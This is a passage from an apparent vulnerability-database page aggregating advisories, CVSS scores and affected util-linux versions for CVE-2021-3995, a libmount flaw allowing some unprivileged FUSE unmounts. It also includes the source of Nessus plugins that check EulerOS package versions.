DATABASE RESOURCES PRICING ABOUT US

{"id": "ALPINE:CVE-2021-3995", "vendorId": null, "type": "alpinelinux", "bulletinFamily": "unix", "title": "CVE-2021-3995", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "published": "2022-08-23T20:15:00", "modified": "2023-02-03T23:30:00", "epss": [{"cve": "CVE-2021-3995", "epss": 0.00042, "percentile": 0.05731, "modified": "2023-12-02"}], "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 1.7}, "severity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, "href": "https://security.alpinelinux.org/vuln/CVE-2021-3995", "reporter": "Alpine Linux Development Team", "references": [], "cvelist": ["CVE-2021-3995"], "immutableFields": [], "lastseen": "2023-12-02T17:25:19", "viewCount": 18, "enchantments": {"score": {"value": 6.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "avleonov", "idList": ["AVLEONOV:317FBD7DA93C95993A9FFF38FB04A987"]}, {"type": "cbl_mariner", "idList": ["CBLMARINER:10709"]}, {"type": "cve", "idList": ["CVE-2021-3995"]}, {"type": "debian", "idList": ["DEBIAN:DSA-5055-1:E8123"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-3995"]}, {"type": "fedora", "idList": ["FEDORA:71F07304C271"]}, {"type": "mageia", "idList": ["MGASA-2022-0076"]}, {"type": "nessus", "idList": ["AL2022_ALAS2022-2022-086.NASL", "AL2022_ALAS2022-2022-099.NASL", "AL2022_ALAS2022-2022-218.NASL", "AL2023_ALAS2023-2023-024.NASL", "DEBIAN_DSA-5055.NASL", "EULEROS_SA-2022-1440.NASL", "EULEROS_SA-2022-1461.NASL", "EULEROS_SA-2022-1616.NASL", "EULEROS_SA-2022-1640.NASL", "EULEROS_SA-2022-1654.NASL", "EULEROS_SA-2022-1668.NASL", "EULEROS_SA-2022-2041.NASL", "EULEROS_SA-2022-2069.NASL", "OPENSUSE-2022-0727-1.NASL", "SUSE_SU-2022-0727-1.NASL", "UBUNTU_USN-5279-1.NASL"]}, {"type": "osv", "idList": ["OSV:CVE-2021-3995", "OSV:DSA-5055-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:170176"]}, {"type": "photon", "idList": ["PHSA-2022-0147", "PHSA-2022-4.0-0147"]}, {"type": "prion", "idList": ["PRION:CVE-2021-3995"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9F041FBF31AA14C1B0593ECDE945330B"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3995"]}, {"type": "redos", "idList": ["ROS-20220128-03"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2022:0727-1"]}, {"type": "thn", "idList": ["THN:85C69AD4617097A82E6BB57E4EBB6186"]}, {"type": "ubuntu", "idList": ["USN-5279-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3995"]}, {"type": "veracode", "idList": ["VERACODE:33917"]}, {"type": "zdt", "idList": ["1337DAY-ID-38096"]}]}, "vulnersScore": 6.5}, "_state": {"score": 1701538112, "dependencies": 0}, "_internal": {"score_hash": "d4c8441bac8d231acc3e9f025ade139b"}, "affectedPackage": [{"OS": "Alpine", "OSVersion": "edge-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.12-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.13-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.14-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.15-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.16-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.17-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}, {"OS": "Alpine", "OSVersion": "3.18-main", "packageFilename": "UNKNOWN", "arch": "noarch", "packageVersion": "2.37.3-r0", "operator": "lt", "packageName": "util-linux"}]}

{"veracode": [{"lastseen": "2023-04-18T06:22:15", "description": "util-linux is vulnerable to denial of service. The vulnerability exists due to a logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. \n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-26T14:30:50", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-3995"], "modified": "2023-02-04T01:37:07", "id": "VERACODE:33917", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-33917/summary", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2023-02-04T02:20:20", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "cvss3": {}, "published": "2022-08-23T20:15:00", "type": "osv", "title": "CVE-2021-3995", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-3995"], "modified": "2023-02-04T02:20:15", "id": "OSV:CVE-2021-3995", "href": "https://osv.dev/vulnerability/CVE-2021-3995", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-08-10T07:20:42", "description": "\nThe Qualys Research Labs discovered two vulnerabilities in util-linux's\nlibmount. These flaws allow an unprivileged user to unmount other users'\nfilesystems that are either world-writable themselves or mounted in a\nworld-writable directory \n([\\\nCVE-2021-3996](https://security-tracker.debian.org/tracker/CVE-2021-3996)), or to unmount FUSE filesystems that belong to certain other \nusers \n([\\\nCVE-2021-3995](https://security-tracker.debian.org/tracker/CVE-2021-3995)).\n\n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 2.36.1-8+deb11u1.\n\n\nWe recommend that you upgrade your util-linux packages.\n\n\nFor the detailed security status of util-linux please refer to its\nsecurity tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/util-linux](https://security-tracker.debian.org/tracker/util-linux)\n\n\n", "cvss3": {}, "published": "2022-01-24T00:00:00", "type": "osv", "title": "util-linux - security update", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2022-08-10T07:20:40", "id": "OSV:DSA-5055-1", "href": "https://osv.dev/vulnerability/DSA-5055-1", "cvss": {"score": 0.0, "vector": "NONE"}}], "cbl_mariner": [{"lastseen": "2023-12-02T08:18:16", "description": "CVE-2021-3995 affecting package util-linux 2.32.1-7. This CVE either no longer is or was never applicable.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-12-02T08:18:16", "type": "cbl_mariner", "title": "CVE-2021-3995 affecting package util-linux 2.32.1-7", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2023-12-02T08:18:16", "id": "CBLMARINER:10709", "href": "", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "debiancve": [{"lastseen": "2023-12-02T18:30:47", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-23T20:15:00", "type": "debiancve", "title": "CVE-2021-3995", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2022-08-23T20:15:00", "id": "DEBIANCVE:CVE-2021-3995", "href": "https://security-tracker.debian.org/tracker/CVE-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "ubuntucve": [{"lastseen": "2023-12-02T13:47:49", "description": "A logic error was found in the libmount library of util-linux in the\nfunction that allows an unprivileged user to unmount a FUSE filesystem.\nThis flaw allows an unprivileged local attacker to unmount FUSE filesystems\nthat belong to certain other users who have a UID that is a prefix of the\nUID of the attacker in its string form. An attacker may use this flaw to\ncause a denial of service to applications that use the affected\nfilesystems.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | introduced in 5fea669e9ef0a08804f72bb40f859f239f68c30a (v2.34)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-01T00:00:00", "type": "ubuntucve", "title": "CVE-2021-3995", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2022-02-01T00:00:00", "id": "UB:CVE-2021-3995", "href": "https://ubuntu.com/security/CVE-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "prion": [{"lastseen": "2023-11-22T01:01:07", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-23T20:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2023-02-03T23:30:00", "id": "PRION:CVE-2021-3995", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-12-02T15:50:31", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-23T20:15:00", "type": "cve", "title": "CVE-2021-3995", "cwe": ["CWE-552"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2023-02-03T23:30:00", "cpe": ["cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-3995", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*"]}], "redhatcve": [{"lastseen": "2023-12-02T17:35:38", "description": "A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.\n#### Mitigation\n\nMitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability. \n\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-24T12:39:50", "type": "redhatcve", "title": "CVE-2021-3995", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 1.7, "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3995"], "modified": "2023-04-06T08:11:30", "id": "RH:CVE-2021-3995", "href": "https://access.redhat.com/security/cve/cve-2021-3995", "cvss": {"score": 1.7, "vector": "AV:L/AC:L/Au:S/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2023-11-01T15:22:58", "description": "According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-05-06T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP10 : util-linux (EulerOS-SA-2022-1654)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-10-30T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1654.NASL", "href": "https://www.tenable.com/plugins/nessus/160673", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160673);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/30\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS 2.0 SP10 : util-linux (EulerOS-SA-2022-1654)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2022-1654\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9180647\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected util-linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3996\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(10)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP10\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"libblkid-2.35.2-2.h23.eulerosv2r10\",\n \"libfdisk-2.35.2-2.h23.eulerosv2r10\",\n \"libmount-2.35.2-2.h23.eulerosv2r10\",\n \"libsmartcols-2.35.2-2.h23.eulerosv2r10\",\n \"libuuid-2.35.2-2.h23.eulerosv2r10\",\n \"util-linux-2.35.2-2.h23.eulerosv2r10\",\n \"util-linux-user-2.35.2-2.h23.eulerosv2r10\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"10\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"util-linux\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-02T15:03:47", "description": "According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2022-04-18T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP9 : util-linux (EulerOS-SA-2022-1461)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996"], "modified": "2023-11-01T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libblkid", "p-cpe:/a:huawei:euleros:libfdisk", "p-cpe:/a:huawei:euleros:libmount", "p-cpe:/a:huawei:euleros:libsmartcols", "p-cpe:/a:huawei:euleros:libuuid", "p-cpe:/a:huawei:euleros:util-linux", "p-cpe:/a:huawei:euleros:util-linux-user", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2022-1461.NASL", "href": "https://www.tenable.com/plugins/nessus/159776", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159776);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/01\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\");\n\n script_name(english:\"EulerOS 2.0 SP9 : util-linux (EulerOS-SA-2022-1461)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the util-linux packages installed, the EulerOS installation on the remote host is affected\nby the following vulnerabilities :\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who 